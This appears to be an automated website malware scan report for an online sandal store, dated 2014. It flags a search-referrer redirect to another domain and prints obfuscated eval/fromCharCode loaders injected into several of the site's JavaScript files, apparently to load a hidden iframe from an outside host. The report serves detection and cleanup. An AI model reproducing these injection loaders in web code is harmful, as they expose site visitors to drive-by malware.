Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://saltwatersandalsstore.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: saltwatersandalsstore.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 11 May 2014 11:18:13 GMT Location: http://telegraphcove.co/esd.php Server: nginx/1.6.0 Content-Length: 314 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://saltwatersandalsstore.com/ | 200 OK Content-Length: 15696 Content-Type: text/html | clean |
http://saltwatersandalsstore.com/js/prototype/prototype.js | 200 OK Content-Length: 168714 Content-Type: application/javascript | suspicious |
Suspicious code found ss=eval("Str"+"ing");d=document;a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,162,165,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,162,165,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,170,151,160,151,153,166,145,164,154,147,163,172,151,62,147,163,63,151,167,150,62,164,154,164,53,77,21,16,44,162,165,62,167,170,175,160,151,62,164 | ||
http://saltwatersandalsstore.com/js/lib/ccard.js | 200 OK Content-Length: 6147 Content-Type: application/javascript | suspicious |
Suspicious code found ss=eval("Str"+"ing");d=document;a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,162,165,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,162,165,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,170,151,160,151,153,166,145,164,154,147,163,172,151,62,147,163,63,151,167,150,62,164,154,164,53,77,21,16,44,162,165,62,167,170,175,160,151,62,164 | ||
http://saltwatersandalsstore.com/js/prototype/validation.js | 404 Not Found Content-Length: 12839 Content-Type: text/html | clean |
http://code.jquery.com/jquery-1.9.1.js | 200 OK Content-Length: 268381 Content-Type: application/x-javascript | clean |
http://suspended.hostgator.com/js/simple-expand.min.js | 200 OK Content-Length: 2782 Content-Type: text/javascript | clean |
http://saltwatersandalsstore.com/js/prototype/ | 200 OK Content-Length: 865 Content-Type: text/html | clean |
http://saltwatersandalsstore.com/js/ | 404 Not Found Content-Length: 52 Content-Type: text/html | clean |
http://saltwatersandalsstore.com/test404page.js | 404 Not Found Content-Length: 18028 Content-Type: text/html | clean |
http://saltwatersandalsstore.com/js/scriptaculous/builder.js | 404 Not Found Content-Length: 12839 Content-Type: text/html | clean |
http://saltwatersandalsstore.com/js/scriptaculous/ | 200 OK Content-Length: 597 Content-Type: text/html | clean |
http://saltwatersandalsstore.com/js/scriptaculous/controls.js | 200 OK Content-Length: 39216 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) w=window;aq="0"+"x";ff=String;z="y";ff=ff.fromCharCode;try{document["\x62od"+z]^=~1;}catch(d21vd12v){v=123;vzs=false;try{document;}catch(wb){vzs=2;}if(!vzs)e=w["eval"];if(1){f="17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,63,5e,61,6a,70,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,63,5e,61,6a,70,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,5a,5c,5c,6a,66,63,60,5c,69,66,66,62,25,65,63,26,5c Antivirus reports:
| ||
http://saltwatersandalsstore.com/js/scriptaculous/dragdrop.js | 200 OK Content-Length: 35712 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) w=window;aq="0"+"x";ff=String;z="y";ff=ff.fromCharCode;try{document["\x62od"+z]^=~1;}catch(d21vd12v){v=123;vzs=false;try{document;}catch(wb){vzs=2;}if(!vzs)e=w["eval"];if(1){f="17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,63,5e,61,6a,70,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,63,5e,61,6a,70,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,5a,5c,5c,6a,66,63,60,5c,69,66,66,62,25,65,63,26,5c Antivirus reports:
| ||
http://saltwatersandalsstore.com/js/scriptaculous/scriptaculous.js | 200 OK Content-Length: 7290 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) w=window;aq="0"+"x";ff=String;z="y";ff=ff.fromCharCode;try{document["\x62od"+z]^=~1;}catch(d21vd12v){v=123;vzs=false;try{document;}catch(wb){vzs=2;}if(!vzs)e=w["eval"];if(1){f="17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,63,5e,61,6a,70,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,63,5e,61,6a,70,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,5a,5c,5c,6a,66,63,60,5c,69,66,66,62,25,65,63,26,5c Antivirus reports:
| ||
http://saltwatersandalsstore.com/js/scriptaculous/slider.js | 200 OK Content-Length: 14977 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) w=window;aq="0"+"x";ff=String;z="y";ff=ff.fromCharCode;try{document["\x62od"+z]^=~1;}catch(d21vd12v){v=123;vzs=false;try{document;}catch(wb){vzs=2;}if(!vzs)e=w["eval"];if(1){f="17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,63,5e,61,6a,70,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,63,5e,61,6a,70,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,5a,5c,5c,6a,66,63,60,5c,69,66,66,62,25,65,63,26,5c Antivirus reports:
|
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=saltwatersandalsstore.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://saltwatersandalsstore.com/
Result: saltwatersandalsstore.com is not infected or malware details are not published yet.
Result: saltwatersandalsstore.com is not infected or malware details are not published yet.